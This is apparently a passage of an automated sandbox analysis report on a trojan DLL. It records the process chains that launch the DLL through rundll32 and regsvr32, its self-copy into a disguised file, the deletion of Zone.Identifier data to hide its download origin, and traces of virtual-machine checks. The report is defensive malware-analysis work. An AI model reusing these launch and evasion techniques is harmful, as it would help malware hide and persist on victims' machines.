                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB57B84_2_04CB57B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBBFBE4_2_04CBBFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBD14C4_2_04CBD14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC7D5B4_2_04CC7D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CD2D534_2_04CD2D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBF3694_2_04CBF369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB6B7A4_2_04CB6B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC57794_2_04CC5779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC437A4_2_04CC437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC017B4_2_04CC017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC4F744_2_04CC4F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC97744_2_04CC9774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CBEF0C4_2_04CBEF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC55154_2_04CC5515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC8D3D4_2_04CC8D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB1F384_2_04CB1F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CC53334_2_04CC5333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351FF586_2_0351FF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035121426_2_03512142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351654A6_2_0351654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351AD086_2_0351AD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350670B6_2_0350670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350C5D86_2_0350C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351EFDD6_2_0351EFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350A4456_2_0350A445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350DE746_2_0350DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03514A666_2_03514A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035220096_2_03522009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03517A0F6_2_03517A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035086366_2_03508636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03522D536_2_03522D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351E9556_2_0351E955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03517D5B6_2_03517D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350D14C6_2_0350D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03514F746_2_03514F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035197746_2_03519774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035157796_2_03515779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03506B7A6_2_03506B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351017B6_2_0351017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351437A6_2_0351437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350F3696_2_0350F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035155156_2_03515515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03522B096_2_03522B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350EF0C6_2_0350EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035153336_2_03515333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03501F386_2_03501F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03518D3D6_2_03518D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351C5D56_2_0351C5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350E7DE6_2_0350E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351FBDE6_2_0351FBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03519DF56_2_03519DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035107F46_2_035107F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035127F96_2_035127F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351E1F86_2_0351E1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03504BFC6_2_03504BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035185FF6_2_035185FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035055FF6_2_035055FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035167E66_2_035167E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035021946_2_03502194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03513D856_2_03513D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035161876_2_03516187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03510F866_2_03510F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350238C6_2_0350238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350FB8E6_2_0350FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035057B86_2_035057B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351D1BC6_2_0351D1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350BFBE6_2_0350BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035217BD6_2_035217BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035077A36_2_035077A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035207AA6_2_035207AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03518FAE6_2_03518FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351B2576_2_0351B257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03512E5D6_2_03512E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350E6406_2_0350E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351F8406_2_0351F840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035074426_2_03507442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035142446_2_03514244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351DC716_2_0351DC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350A8716_2_0350A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351A4746_2_0351A474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035070786_2_03507078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03507E796_2_03507E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351567B6_2_0351567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035232636_2_03523263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03520A646_2_03520A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03519A016_2_03519A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035188066_2_03518806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035034316_2_03503431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350B8206_2_0350B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351CAD56_2_0351CAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351CCD96_2_0351CCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351D8DB6_2_0351D8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035080C06_2_035080C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351BEFD6_2_0351BEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351E4E56_2_0351E4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350F0E96_2_0350F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03523EE96_2_03523EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035200EF6_2_035200EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350C6B86_2_0350C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03510ABA6_2_03510ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03510EBC6_2_03510EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035246BD6_2_035246BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03501CA16_2_03501CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0351A2A56_2_0351A2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_035236AA6_2_035236AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0350BAA96_2_0350BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03513EAA6_2_03513EAA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10030E38 appears 48 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10030535 appears 69 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030E38 appears 58 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030535 appears 87 times
                      Source: nV5Wu77N8J.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: nV5Wu77N8J.dllVirustotal: Detection: 16%
                      Source: nV5Wu77N8J.dllReversingLabs: Detection: 13%
                      Source: nV5Wu77N8J.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.ogu",XLurkV
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7128 -ip 7128
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bdaefwhkzqb\lrinxnmhyts.ogu",DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 568
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.ogu",XLurkVJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bdaefwhkzqb\lrinxnmhyts.ogu",DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7128 -ip 7128Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 568Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER37B8.tmpJump to behavior
                      Source: classification engineClassification label: mal92.troj.evad.winDLL@27/10@0/27
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6712:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7128
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10021183 LoadResource,LockResource,SizeofResource,2_2_10021183
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726747041.0000000002F12000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726920017.0000000002F12000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726719293.00000000049D6000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.727134531.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726928256.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726753757.0000000002F18000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000010.00000003.727134531.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726928256.0000000002F18000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726753757.0000000002F18000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726739926.0000000002F0C000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.727328906.0000000002F0C000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000010.00000003.726747041.0000000002F12000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.726920017.0000000002F12000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000010.00000002.741443173.0000000000A72000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000010.00000003.730451291.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.726739926.0000000002F0C000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.727328906.0000000002F0C000.00000004.00000001.sdmp
                      Source: nV5Wu77N8J.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: nV5Wu77N8J.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: nV5Wu77N8J.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: nV5Wu77N8J.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: nV5Wu77N8J.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003060D push ecx; ret 2_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003060D push ecx; ret 3_2_10030620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10030E7D push ecx; ret 3_2_10030E90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04CB1195 push cs; iretd 4_2_04CB1197
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03501195 push cs; iretd 6_2_03501197
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_1003E278
                      Source: nV5Wu77N8J.dllStatic PE information: real checksum: 0x970bf should be: 0x91c5b
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.oguJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Bdaefwhkzqb\lrinxnmhyts.ogu:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Rejasxmfwpqnhtgn\jdiy.puy:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,2_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100250A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_1001DFC0
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6048Thread sleep time: -150000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-16653
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-21435
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 4.8 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.2 %
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-16655
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-21136
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: Amcache.hve.16.drBinary or memory string: VMware
                      Source: Amcache.hve.16.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.16.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.16.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.16.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.16.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.16.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.16.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
